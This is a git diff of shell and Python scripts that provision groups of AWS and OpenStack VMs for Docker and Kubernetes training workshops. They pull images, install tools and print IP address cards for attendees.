||||
_cmd_pssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
shift
|
||||
|
||||
pssh "$@"
|
||||
}
|
||||
|
||||
_cmd pull_images "Pre-pull a bunch of Docker images"
|
||||
_cmd_pull_images() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
pull_tag $TAG
|
||||
need_tag
|
||||
pull_tag
|
||||
}
|
||||
|
||||
_cmd retag "Apply a new tag to a batch of VMs"
|
||||
_cmd remap_nodeports "Remap NodePort range to 10000-10999"
|
||||
_cmd_remap_nodeports() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
FIND_LINE=" - --service-cluster-ip-range=10.96.0.0\/12"
|
||||
ADD_LINE=" - --service-node-port-range=10000-10999"
|
||||
MANIFEST_FILE=/etc/kubernetes/manifests/kube-apiserver.yaml
|
||||
pssh "
|
||||
if i_am_first_node && ! grep -q '$ADD_LINE' $MANIFEST_FILE; then
|
||||
sudo sed -i 's/\($FIND_LINE\)\$/\1\n$ADD_LINE/' $MANIFEST_FILE
|
||||
fi"
|
||||
}
|
||||
|
||||
_cmd quotas "Check our infrastructure quotas (max instances)"
|
||||
_cmd_quotas() {
|
||||
need_infra $1
|
||||
infra_quotas
|
||||
}
|
||||
|
||||
_cmd retag "(FIXME) Apply a new tag to a group of VMs"
|
||||
_cmd_retag() {
|
||||
OLDTAG=$1
|
||||
NEWTAG=$2
|
||||
need_tag $OLDTAG
|
||||
TAG=$OLDTAG
|
||||
need_tag
|
||||
if [[ -z "$NEWTAG" ]]; then
|
||||
die "You must specify a new tag to apply."
|
||||
fi
|
||||
aws_tag_instances $OLDTAG $NEWTAG
|
||||
}
|
||||
|
||||
_cmd start "Start a batch of VMs"
|
||||
_cmd ssh "Open an SSH session to the first node of a tag"
|
||||
_cmd_ssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
IP=$(head -1 tags/$TAG/ips.txt)
|
||||
info "Logging into $IP"
|
||||
ssh docker@$IP
|
||||
}
|
||||
|
||||
_cmd start "Start a group of VMs"
|
||||
_cmd_start() {
|
||||
# Number of instances to create
|
||||
COUNT=$1
|
||||
# Optional settings file (to carry on with deployment)
|
||||
SETTINGS=$2
|
||||
while [ ! -z "$*" ]; do
|
||||
case "$1" in
|
||||
--infra) INFRA=$2; shift 2;;
|
||||
--settings) SETTINGS=$2; shift 2;;
|
||||
--count) COUNT=$2; shift 2;;
|
||||
--tag) TAG=$2; shift 2;;
|
||||
*) die "Unrecognized parameter: $1."
|
||||
esac
|
||||
done
|
||||
|
||||
if [ -z "$INFRA" ]; then
|
||||
die "Please add --infra flag to specify which infrastructure file to use."
|
||||
fi
|
||||
if [ -z "$SETTINGS" ]; then
|
||||
die "Please add --settings flag to specify which settings file to use."
|
||||
fi
|
||||
if [ -z "$COUNT" ]; then
|
||||
die "Indicate number of instances to start."
|
||||
COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
|
||||
warning "No --count option was specified. Using value from settings file ($COUNT)."
|
||||
fi
|
||||
|
||||
# Print our AWS username, to ease the pain of credential-juggling
|
||||
greet
|
||||
# Check that the specified settings and infrastructure are valid.
|
||||
need_settings $SETTINGS
|
||||
need_infra $INFRA
|
||||
|
||||
# Upload our SSH keys to AWS if needed, to be added to each VM's authorized_keys
|
||||
key_name=$(sync_keys)
|
||||
|
||||
AMI=$(_cmd_ami) # Retrieve the AWS image ID
|
||||
if [ -z "$AMI" ]; then
|
||||
die "I could not find which AMI to use in this region. Try another region?"
|
||||
if [ -z "$TAG" ]; then
|
||||
TAG=$(_cmd_maketag)
|
||||
fi
|
||||
TOKEN=$(get_token) # generate a timestamp token for this batch of VMs
|
||||
AWS_KEY_NAME=$(make_key_name)
|
||||
|
||||
sep "Starting instances"
|
||||
info " Count: $COUNT"
|
||||
info " Region: $AWS_DEFAULT_REGION"
|
||||
info " Token/tag: $TOKEN"
|
||||
info " AMI: $AMI"
|
||||
info " Key name: $AWS_KEY_NAME"
|
||||
result=$(aws ec2 run-instances \
|
||||
--key-name $AWS_KEY_NAME \
|
||||
--count $COUNT \
|
||||
--instance-type ${AWS_INSTANCE_TYPE-t2.medium} \
|
||||
--client-token $TOKEN \
|
||||
--image-id $AMI)
|
||||
reservation_id=$(echo "$result" | head -1 | awk '{print $2}')
|
||||
info "Reservation ID: $reservation_id"
|
||||
sep
|
||||
|
||||
# if instance creation succeeded, we should have some IDs
|
||||
IDS=$(aws_get_instance_ids_by_client_token $TOKEN)
|
||||
if [ -z "$IDS" ]; then
|
||||
die "Instance creation failed."
|
||||
fi
|
||||
|
||||
# Tag these new instances with a tag that is the same as the token
|
||||
TAG=$TOKEN
|
||||
aws_tag_instances $TOKEN $TAG
|
||||
|
||||
wait_until_tag_is_running $TAG $COUNT
|
||||
mkdir -p tags/$TAG
|
||||
ln -s ../../$INFRA tags/$TAG/infra.sh
|
||||
ln -s ../../$SETTINGS tags/$TAG/settings.yaml
|
||||
echo creating > tags/$TAG/status
|
||||
|
||||
infra_start $COUNT
|
||||
sep
|
||||
info "Successfully created $COUNT instances with tag $TAG"
|
||||
sep
|
||||
echo created > tags/$TAG/status
|
||||
|
||||
mkdir -p tags/$TAG
|
||||
IPS=$(aws_get_instance_ips_by_tag $TAG)
|
||||
echo "$IPS" >tags/$TAG/ips.txt
|
||||
link_tag $TAG
|
||||
if [ -n "$SETTINGS" ]; then
|
||||
_cmd_deploy $TAG $SETTINGS
|
||||
else
|
||||
info "To deploy or kill these instances, run one of the following:"
|
||||
info "$0 deploy $TAG <settings/somefile.yaml>"
|
||||
info "$0 stop $TAG"
|
||||
fi
|
||||
}
|
||||
|
||||
_cmd ec2quotas "Check our EC2 quotas (max instances)"
|
||||
_cmd_ec2quotas() {
|
||||
greet
|
||||
|
||||
max_instances=$(aws ec2 describe-account-attributes \
|
||||
--attribute-names max-instances \
|
||||
--query 'AccountAttributes[*][AttributeValues]')
|
||||
info "In the current region ($AWS_DEFAULT_REGION) you can deploy up to $max_instances instances."
|
||||
|
||||
# Print list of AWS EC2 regions, highlighting ours ($AWS_DEFAULT_REGION) in the list
|
||||
# If our $AWS_DEFAULT_REGION is not valid, the error message will be pretty descriptive:
|
||||
# Could not connect to the endpoint URL: "https://ec2.foo.amazonaws.com/"
|
||||
info "Available regions:"
|
||||
aws ec2 describe-regions | awk '{print $3}' | grep --color=auto $AWS_DEFAULT_REGION -C50
|
||||
info "To deploy Docker on these instances, you can run:"
|
||||
info "$0 deploy $TAG"
|
||||
info "To terminate these instances, you can run:"
|
||||
info "$0 stop $TAG"
|
||||
}
|
||||
|
||||
_cmd stop "Stop (terminate, shutdown, kill, remove, destroy...) instances"
|
||||
_cmd_stop() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
aws_kill_instances_by_tag $TAG
|
||||
need_tag
|
||||
infra_stop
|
||||
echo stopped > tags/$TAG/status
|
||||
}
|
||||
|
||||
_cmd test "Run tests (pre-flight checks) on a batch of VMs"
|
||||
_cmd tags "List groups of VMs known locally"
|
||||
_cmd_tags() {
|
||||
(
|
||||
cd tags
|
||||
echo "[#] [Status] [Tag] [Infra]" \
|
||||
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
|
||||
for tag in *; do
|
||||
if [ -f $tag/ips.txt ]; then
|
||||
count="$(wc -l < $tag/ips.txt)"
|
||||
else
|
||||
count="?"
|
||||
fi
|
||||
if [ -f $tag/status ]; then
|
||||
status="$(cat $tag/status)"
|
||||
else
|
||||
status="?"
|
||||
fi
|
||||
if [ -f $tag/infra.sh ]; then
|
||||
infra="$(basename $(readlink $tag/infra.sh))"
|
||||
else
|
||||
infra="?"
|
||||
fi
|
||||
echo "$count $status $tag $infra" \
|
||||
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
|
||||
done
|
||||
)
|
||||
}
|
||||
|
||||
_cmd test "Run tests (pre-flight checks) on a group of VMs"
|
||||
_cmd_test() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
test_tag $TAG
|
||||
need_tag
|
||||
test_tag
|
||||
}
|
||||
|
||||
###
|
||||
_cmd tmux "Log into the first node and start a tmux server"
|
||||
_cmd_tmux() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
IP=$(head -1 tags/$TAG/ips.txt)
|
||||
info "Opening ssh+tmux with $IP"
|
||||
rm -f /tmp/tmux-$UID/default
|
||||
ssh -t -L /tmp/tmux-$UID/default:/tmp/tmux-1001/default docker@$IP tmux new-session -As 0
|
||||
}
|
||||
|
||||
_cmd helmprom "Install Helm and Prometheus"
|
||||
_cmd_helmprom() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
pssh "
|
||||
if i_am_first_node; then
|
||||
sudo -u docker -H helm repo add stable https://kubernetes-charts.storage.googleapis.com/
|
||||
sudo -u docker -H helm install prometheus stable/prometheus \
|
||||
--namespace kube-system \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.service.nodePort=30090 \
|
||||
--set server.persistentVolume.enabled=false \
|
||||
--set alertmanager.enabled=false
|
||||
fi"
|
||||
}
|
||||
|
||||
# Sometimes, weave fails to come up on some nodes.
|
||||
# Symptom: the pods on a node are unreachable (they don't even ping).
|
||||
# Remedy: wipe out Weave state and delete weave pod on that node.
|
||||
# Specifically, identify the weave pod that is defective, then:
|
||||
# kubectl -n kube-system exec weave-net-XXXXX -c weave rm /weavedb/weave-netdata.db
|
||||
# kubectl -n kube-system delete pod weave-net-XXXXX
|
||||
_cmd weavetest "Check that weave seems properly setup"
|
||||
_cmd_weavetest() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
pssh "
|
||||
kubectl -n kube-system get pods -o name | grep weave | cut -d/ -f2 |
|
||||
xargs -I POD kubectl -n kube-system exec POD -c weave -- \
|
||||
sh -c \"./weave --local status | grep Connections | grep -q ' 1 failed' || ! echo POD \""
|
||||
}
|
||||
|
||||
_cmd webssh "Install a WEB SSH server on the machines (port 1080)"
|
||||
_cmd_webssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
pssh "
|
||||
sudo apt-get update &&
|
||||
sudo apt-get install python-tornado python-paramiko -y"
|
||||
pssh "
|
||||
[ -d webssh ] || git clone https://github.com/jpetazzo/webssh"
|
||||
pssh "
|
||||
for KEYFILE in /etc/ssh/*.pub; do
|
||||
read a b c < \$KEYFILE; echo localhost \$a \$b
|
||||
done > webssh/known_hosts"
|
||||
pssh "cat >webssh.service <<EOF
|
||||
[Unit]
|
||||
Description=webssh
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
|
||||
[Service]
|
||||
WorkingDirectory=/home/ubuntu/webssh
|
||||
ExecStart=/usr/bin/env python run.py --fbidhttp=false --port=1080 --policy=reject
|
||||
User=nobody
|
||||
Group=nogroup
|
||||
Restart=always
|
||||
EOF"
|
||||
pssh "
|
||||
sudo systemctl enable \$PWD/webssh.service &&
|
||||
sudo systemctl start webssh.service"
|
||||
}
|
||||
|
||||
_cmd www "Run a web server to access card HTML and PDF"
|
||||
_cmd_www() {
|
||||
cd www
|
||||
IPADDR=$(curl -sL canihazip.com/s)
|
||||
info "The following files are available:"
|
||||
for F in *; do
|
||||
echo "http://$IPADDR:8000/$F"
|
||||
done
|
||||
info "Press Ctrl-C to stop server."
|
||||
python3 -m http.server
|
||||
}
|
||||
|
||||
greet() {
|
||||
IAMUSER=$(aws iam get-user --query 'User.UserName')
|
||||
info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
|
||||
}
|
||||
|
||||
link_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
IPS_FILE=tags/$TAG/ips.txt
|
||||
need_ips_file $IPS_FILE
|
||||
ln -sf $IPS_FILE ips.txt
|
||||
}
|
||||
|
||||
pull_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
link_tag $TAG
|
||||
if [ ! -s $IPS_FILE ]; then
|
||||
die "Nonexistent or empty IPs file $IPS_FILE."
|
||||
fi
|
||||
|
||||
# Pre-pull a bunch of images
|
||||
pssh --timeout 900 'for I in \
|
||||
debian:latest \
|
||||
ubuntu:latest \
|
||||
fedora:latest \
|
||||
centos:latest \
|
||||
elasticsearch:2 \
|
||||
postgres \
|
||||
redis \
|
||||
alpine \
|
||||
registry \
|
||||
nicolaka/netshoot \
|
||||
jpetazzo/trainingwheels \
|
||||
golang \
|
||||
training/namer \
|
||||
dockercoins/hasher \
|
||||
dockercoins/rng \
|
||||
dockercoins/webui \
|
||||
dockercoins/worker \
|
||||
logstash \
|
||||
prom/node-exporter \
|
||||
google/cadvisor \
|
||||
dockersamples/visualizer \
|
||||
nathanleclaire/redisonrails; do
|
||||
debian:latest \
|
||||
ubuntu:latest \
|
||||
fedora:latest \
|
||||
centos:latest \
|
||||
elasticsearch:2 \
|
||||
postgres \
|
||||
redis \
|
||||
alpine \
|
||||
registry \
|
||||
nicolaka/netshoot \
|
||||
jpetazzo/trainingwheels \
|
||||
golang \
|
||||
training/namer \
|
||||
dockercoins/hasher \
|
||||
dockercoins/rng \
|
||||
dockercoins/webui \
|
||||
dockercoins/worker \
|
||||
logstash \
|
||||
prom/node-exporter \
|
||||
google/cadvisor \
|
||||
dockersamples/visualizer \
|
||||
nathanleclaire/redisonrails; do
|
||||
sudo -u docker docker pull $I
|
||||
done'
|
||||
|
||||
info "Finished pulling images for $TAG."
|
||||
info "You may now want to run:"
|
||||
info "$0 cards $TAG <settings/somefile.yaml>"
|
||||
}
|
||||
|
||||
wait_until_tag_is_running() {
|
||||
max_retry=50
|
||||
TAG=$1
|
||||
COUNT=$2
|
||||
i=0
|
||||
done_count=0
|
||||
while [[ $done_count -lt $COUNT ]]; do
|
||||
let "i += 1"
|
||||
info "$(printf "%d/%d instances online" $done_count $COUNT)"
|
||||
done_count=$(aws ec2 describe-instances \
|
||||
--filters "Name=instance-state-name,Values=running" \
|
||||
"Name=tag:Name,Values=$TAG" \
|
||||
--query "Reservations[*].Instances[*].State.Name" \
|
||||
| tr "\t" "\n" \
|
||||
| wc -l)
|
||||
|
||||
if [[ $i -gt $max_retry ]]; then
|
||||
die "Timed out while waiting for instance creation (after $max_retry retries)"
|
||||
fi
|
||||
sleep 1
|
||||
done
|
||||
}
|
||||
|
||||
tag_is_reachable() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
link_tag $TAG
|
||||
pssh -t 5 true 2>&1 >/dev/null
|
||||
}
|
||||
|
||||
test_tag() {
|
||||
TAG=$1
|
||||
ips_file=tags/$TAG/ips.txt
|
||||
info "Picking a random IP address in $ips_file to run tests."
|
||||
n=$((1 + $RANDOM % $(wc -l <$ips_file)))
|
||||
ip=$(head -n $n $ips_file | tail -n 1)
|
||||
ip=$(shuf -n1 $ips_file)
|
||||
test_vm $ip
|
||||
info "Tests complete."
|
||||
}
|
||||
@@ -484,8 +708,8 @@ test_vm() {
|
||||
for cmd in "hostname" \
|
||||
"whoami" \
|
||||
"hostname -i" \
|
||||
"cat /tmp/node" \
|
||||
"cat /tmp/ipv4" \
|
||||
"ls -l /usr/local/bin/i_am_first_node" \
|
||||
"grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
|
||||
"cat /etc/hosts" \
|
||||
"hostnamectl status" \
|
||||
"docker version | grep Version -B1" \
|
||||
@@ -545,18 +769,3 @@ sync_keys() {
|
||||
info "Using existing key $AWS_KEY_NAME."
|
||||
fi
|
||||
}
|
||||
|
||||
get_token() {
|
||||
if [ -z $USER ]; then
|
||||
export USER=anonymous
|
||||
fi
|
||||
date +%Y-%m-%d-%H-%M-$USER
|
||||
}
|
||||
|
||||
describe_tag() {
|
||||
# Display instance details and reachability/status information
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
aws_display_instances_by_tag $TAG
|
||||
aws_display_instance_statuses_by_tag $TAG
|
||||
}
|
||||
|
||||
30
prepare-vms/lib/infra.sh
Normal file
30
prepare-vms/lib/infra.sh
Normal file
@@ -0,0 +1,30 @@
|
||||
# Default stub functions for infrastructure libraries.
|
||||
# When loading an infrastructure library, these functions will be overridden.
|
||||
|
||||
infra_list() {
|
||||
warning "infra_list is unsupported on $INFRACLASS."
|
||||
}
|
||||
|
||||
infra_quotas() {
|
||||
warning "infra_quotas is unsupported on $INFRACLASS."
|
||||
}
|
||||
|
||||
infra_start() {
|
||||
warning "infra_start is unsupported on $INFRACLASS."
|
||||
}
|
||||
|
||||
infra_stop() {
|
||||
warning "infra_stop is unsupported on $INFRACLASS."
|
||||
}
|
||||
|
||||
infra_quotas() {
|
||||
warning "infra_quotas is unsupported on $INFRACLASS."
|
||||
}
|
||||
|
||||
infra_opensg() {
|
||||
warning "infra_opensg is unsupported on $INFRACLASS."
|
||||
}
|
||||
|
||||
infra_disableaddrchecks() {
|
||||
warning "infra_disableaddrchecks is unsupported on $INFRACLASS."
|
||||
}
|
||||
216
prepare-vms/lib/infra/aws.sh
Normal file
216
prepare-vms/lib/infra/aws.sh
Normal file
@@ -0,0 +1,216 @@
|
||||
infra_list() {
|
||||
aws_display_tags
|
||||
}
|
||||
|
||||
infra_quotas() {
|
||||
greet
|
||||
|
||||
max_instances=$(aws ec2 describe-account-attributes \
|
||||
--attribute-names max-instances \
|
||||
--query 'AccountAttributes[*][AttributeValues]')
|
||||
info "In the current region ($AWS_DEFAULT_REGION) you can deploy up to $max_instances instances."
|
||||
|
||||
# Print list of AWS EC2 regions, highlighting ours ($AWS_DEFAULT_REGION) in the list
|
||||
# If our $AWS_DEFAULT_REGION is not valid, the error message will be pretty descriptive:
|
||||
# Could not connect to the endpoint URL: "https://ec2.foo.amazonaws.com/"
|
||||
info "Available regions:"
|
||||
aws ec2 describe-regions | awk '{print $3}' | grep --color=auto $AWS_DEFAULT_REGION -C50
|
||||
}
|
||||
|
||||
infra_start() {
|
||||
COUNT=$1
|
||||
|
||||
# Print our AWS username, to ease the pain of credential-juggling
|
||||
greet
|
||||
|
||||
# Upload our SSH keys to AWS if needed, to be added to each VM's authorized_keys
|
||||
key_name=$(sync_keys)
|
||||
|
||||
AMI=$(aws_get_ami) # Retrieve the AWS image ID
|
||||
if [ -z "$AMI" ]; then
|
||||
die "I could not find which AMI to use in this region. Try another region?"
|
||||
fi
|
||||
AWS_KEY_NAME=$(make_key_name)
|
||||
AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}
|
||||
|
||||
sep "Starting instances"
|
||||
info " Count: $COUNT"
|
||||
info " Region: $AWS_DEFAULT_REGION"
|
||||
info " Token/tag: $TAG"
|
||||
info " AMI: $AMI"
|
||||
info " Key name: $AWS_KEY_NAME"
|
||||
info " Instance type: $AWS_INSTANCE_TYPE"
|
||||
result=$(aws ec2 run-instances \
|
||||
--key-name $AWS_KEY_NAME \
|
||||
--count $COUNT \
|
||||
--instance-type $AWS_INSTANCE_TYPE \
|
||||
--client-token $TAG \
|
||||
--block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
|
||||
--image-id $AMI)
|
||||
reservation_id=$(echo "$result" | head -1 | awk '{print $2}')
|
||||
info "Reservation ID: $reservation_id"
|
||||
sep
|
||||
|
||||
# if instance creation succeeded, we should have some IDs
|
||||
IDS=$(aws_get_instance_ids_by_client_token $TAG)
|
||||
if [ -z "$IDS" ]; then
|
||||
die "Instance creation failed."
|
||||
fi
|
||||
|
||||
# Tag these new instances with a tag that is the same as the token
|
||||
aws_tag_instances $TAG $TAG
|
||||
|
||||
# Wait until EC2 API tells us that the instances are running
|
||||
wait_until_tag_is_running $TAG $COUNT
|
||||
|
||||
aws_get_instance_ips_by_tag $TAG > tags/$TAG/ips.txt
|
||||
}
|
||||
|
||||
infra_stop() {
|
||||
aws_kill_instances_by_tag
|
||||
}
|
||||
|
||||
infra_opensg() {
|
||||
aws ec2 authorize-security-group-ingress \
|
||||
--group-name default \
|
||||
--protocol icmp \
|
||||
--port -1 \
|
||||
--cidr 0.0.0.0/0
|
||||
|
||||
aws ec2 authorize-security-group-ingress \
|
||||
--group-name default \
|
||||
--protocol udp \
|
||||
--port 0-65535 \
|
||||
--cidr 0.0.0.0/0
|
||||
|
||||
aws ec2 authorize-security-group-ingress \
|
||||
--group-name default \
|
||||
--protocol tcp \
|
||||
--port 0-65535 \
|
||||
--cidr 0.0.0.0/0
|
||||
}
|
||||
|
||||
infra_disableaddrchecks() {
|
||||
IDS=$(aws_get_instance_ids_by_tag $TAG)
|
||||
for ID in $IDS; do
|
||||
info "Disabling source/destination IP checks on: $ID"
|
||||
aws ec2 modify-instance-attribute --source-dest-check "{\"Value\": false}" --instance-id $ID
|
||||
done
|
||||
}
|
||||
|
||||
wait_until_tag_is_running() {
|
||||
max_retry=100
|
||||
i=0
|
||||
done_count=0
|
||||
while [[ $done_count -lt $COUNT ]]; do
|
||||
let "i += 1"
|
||||
info "$(printf "%d/%d instances online" $done_count $COUNT)"
|
||||
done_count=$(aws ec2 describe-instances \
|
||||
--filters "Name=tag:Name,Values=$TAG" \
|
||||
"Name=instance-state-name,Values=running" \
|
||||
--query "length(Reservations[].Instances[])")
|
||||
if [[ $i -gt $max_retry ]]; then
|
||||
die "Timed out while waiting for instance creation (after $max_retry retries)"
|
||||
fi
|
||||
sleep 1
|
||||
done
|
||||
}
|
||||
|
||||
aws_display_tags() {
|
||||
# Print all "Name" tags in our region with their instance count
|
||||
echo "[#] [Status] [Token] [Tag]" \
|
||||
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
|
||||
aws ec2 describe-instances \
|
||||
--query "Reservations[*].Instances[*].[State.Name,ClientToken,Tags[0].Value]" \
|
||||
| tr -d "\r" \
|
||||
| uniq -c \
|
||||
| sort -k 3 \
|
||||
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
|
||||
}
|
||||
|
||||
aws_get_tokens() {
|
||||
aws ec2 describe-instances --output text \
|
||||
--query 'Reservations[*].Instances[*].[ClientToken]' \
|
||||
| sort -u
|
||||
}
|
||||
|
||||
aws_display_instance_statuses_by_tag() {
|
||||
IDS=$(aws ec2 describe-instances \
|
||||
--filters "Name=tag:Name,Values=$TAG" \
|
||||
--query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ')
|
||||
|
||||
aws ec2 describe-instance-status \
|
||||
--instance-ids $IDS \
|
||||
--query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
|
||||
--output table
|
||||
}
|
||||
|
||||
aws_display_instances_by_tag() {
|
||||
result=$(aws ec2 describe-instances --output table \
|
||||
--filter "Name=tag:Name,Values=$TAG" \
|
||||
--query "Reservations[*].Instances[*].[ \
|
||||
InstanceId, \
|
||||
State.Name, \
|
||||
Tags[0].Value, \
|
||||
PublicIpAddress, \
|
||||
InstanceType \
|
||||
]"
|
||||
)
|
||||
if [[ -z $result ]]; then
|
||||
die "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
|
||||
else
|
||||
echo "$result"
|
||||
fi
|
||||
}
|
||||
|
||||
aws_get_instance_ids_by_filter() {
|
||||
FILTER=$1
|
||||
aws ec2 describe-instances --filters $FILTER \
|
||||
--query Reservations[*].Instances[*].InstanceId \
|
||||
--output text | tr "\t" "\n" | tr -d "\r"
|
||||
}
|
||||
|
||||
aws_get_instance_ids_by_client_token() {
|
||||
TOKEN=$1
|
||||
aws_get_instance_ids_by_filter Name=client-token,Values=$TOKEN
|
||||
}
|
||||
|
||||
aws_get_instance_ids_by_tag() {
|
||||
aws_get_instance_ids_by_filter Name=tag:Name,Values=$TAG
|
||||
}
|
||||
|
||||
aws_get_instance_ips_by_tag() {
|
||||
aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
|
||||
--output text \
|
||||
--query "Reservations[*].Instances[*].PublicIpAddress" \
|
||||
| tr "\t" "\n" \
|
||||
| sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
|
||||
}
|
||||
|
||||
aws_kill_instances_by_tag() {
|
||||
IDS=$(aws_get_instance_ids_by_tag $TAG)
|
||||
if [ -z "$IDS" ]; then
|
||||
die "Invalid tag."
|
||||
fi
|
||||
|
||||
info "Deleting instances with tag $TAG."
|
||||
|
||||
aws ec2 terminate-instances --instance-ids $IDS \
|
||||
| grep ^TERMINATINGINSTANCES
|
||||
|
||||
info "Deleted instances with tag $TAG."
|
||||
}
|
||||
|
||||
aws_tag_instances() {
|
||||
OLD_TAG_OR_TOKEN=$1
|
||||
NEW_TAG=$2
|
||||
IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
|
||||
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
|
||||
IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
|
||||
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
|
||||
}
|
||||
|
||||
aws_get_ami() {
|
||||
##VERSION##
|
||||
find_ubuntu_ami -r $AWS_DEFAULT_REGION -a amd64 -v 18.04 -t hvm:ebs -N -q
|
||||
}
|
||||
8
prepare-vms/lib/infra/generic.sh
Normal file
8
prepare-vms/lib/infra/generic.sh
Normal file
@@ -0,0 +1,8 @@
|
||||
infra_start() {
|
||||
COUNT=$1
|
||||
info "You should now run your provisioning commands for $COUNT machines."
|
||||
info "Note: no machines have been automatically created!"
|
||||
info "Once done, put the list of IP addresses in tags/$TAG/ips.txt"
|
||||
info "(one IP address per line, without any comments or extra lines)."
|
||||
touch tags/$TAG/ips.txt
|
||||
}
|
||||
20
prepare-vms/lib/infra/openstack.sh
Normal file
20
prepare-vms/lib/infra/openstack.sh
Normal file
@@ -0,0 +1,20 @@
|
||||
infra_start() {
|
||||
COUNT=$1
|
||||
|
||||
cp terraform/*.tf tags/$TAG
|
||||
(
|
||||
cd tags/$TAG
|
||||
terraform init
|
||||
echo prefix = \"$TAG\" >> terraform.tfvars
|
||||
echo count = \"$COUNT\" >> terraform.tfvars
|
||||
terraform apply -auto-approve
|
||||
terraform output ip_addresses > ips.txt
|
||||
)
|
||||
}
|
||||
|
||||
infra_stop() {
|
||||
(
|
||||
cd tags/$TAG
|
||||
terraform destroy -auto-approve
|
||||
)
|
||||
}
|
||||
@@ -1,20 +1,15 @@
|
||||
#!/usr/bin/env python
|
||||
#!/usr/bin/env python3
|
||||
import os
|
||||
import sys
|
||||
import yaml
|
||||
import jinja2
|
||||
|
||||
def prettify(l):
|
||||
l = [ip.strip() for ip in l]
|
||||
ret = [ "node{}: <code>{}</code>".format(i+1, s) for (i, s) in zip(range(len(l)), l) ]
|
||||
return ret
|
||||
|
||||
# Read settings from user-provided settings file
|
||||
SETTINGS = yaml.load(open(sys.argv[1]))
|
||||
|
||||
clustersize = SETTINGS["clustersize"]
|
||||
context = yaml.safe_load(open(sys.argv[1]))
|
||||
|
||||
ips = list(open("ips.txt"))
|
||||
clustersize = context["clustersize"]
|
||||
|
||||
print("---------------------------------------------")
|
||||
print(" Number of IPs: {}".format(len(ips)))
|
||||
@@ -30,21 +25,32 @@ while ips:
|
||||
ips = ips[clustersize:]
|
||||
clusters.append(cluster)
|
||||
|
||||
template_file_name = SETTINGS["cards_template"]
|
||||
template = jinja2.Template(open(template_file_name).read())
|
||||
context["clusters"] = clusters
|
||||
|
||||
template_file_name = context["cards_template"]
|
||||
template_file_path = os.path.join(
|
||||
os.path.dirname(__file__),
|
||||
"..",
|
||||
"templates",
|
||||
template_file_name
|
||||
)
|
||||
template = jinja2.Template(open(template_file_path).read())
|
||||
with open("ips.html", "w") as f:
|
||||
f.write(template.render(clusters=clusters, **SETTINGS))
|
||||
f.write(template.render(**context))
|
||||
print("Generated ips.html")
|
||||
|
||||
|
||||
try:
|
||||
import pdfkit
|
||||
paper_size = context["paper_size"]
|
||||
margin = {"A4": "0.5cm", "Letter": "0.2in"}[paper_size]
|
||||
with open("ips.html") as f:
|
||||
pdfkit.from_file(f, "ips.pdf", options={
|
||||
"page-size": SETTINGS["paper_size"],
|
||||
"margin-top": SETTINGS["paper_margin"],
|
||||
"margin-bottom": SETTINGS["paper_margin"],
|
||||
"margin-left": SETTINGS["paper_margin"],
|
||||
"margin-right": SETTINGS["paper_margin"],
|
||||
"page-size": paper_size,
|
||||
"margin-top": margin,
|
||||
"margin-bottom": margin,
|
||||
"margin-left": margin,
|
||||
"margin-right": margin,
|
||||
})
|
||||
print("Generated ips.pdf")
|
||||
except ImportError:
|
||||
|
||||
@@ -12,6 +12,7 @@ config = yaml.load(open("/tmp/settings.yaml"))
|
||||
COMPOSE_VERSION = config["compose_version"]
|
||||
MACHINE_VERSION = config["machine_version"]
|
||||
CLUSTER_SIZE = config["clustersize"]
|
||||
CLUSTER_PREFIX = config["clusterprefix"]
|
||||
ENGINE_VERSION = config["engine_version"]
|
||||
DOCKER_USER_PASSWORD = config["docker_user_password"]
|
||||
|
||||
@@ -64,6 +65,15 @@ system("""sudo -u docker tee -a /home/docker/.bashrc <<SQRL
|
||||
export PS1='\e[1m\e[31m[{}] \e[32m(\\$(docker-prompt)) \e[34m\u@\h\e[35m \w\e[0m\n$ '
|
||||
SQRL""".format(ipv4))
|
||||
|
||||
# Bigger history, in a different file, and saved before executing each command
|
||||
system("""sudo -u docker tee -a /home/docker/.bashrc <<SQRL
|
||||
export HISTSIZE=9999
|
||||
export HISTFILESIZE=9999
|
||||
shopt -s histappend
|
||||
trap 'history -a' DEBUG
|
||||
export HISTFILE=~/.history
|
||||
SQRL""")
|
||||
|
||||
# Custom .vimrc
|
||||
system("""sudo -u docker tee /home/docker/.vimrc <<SQRL
|
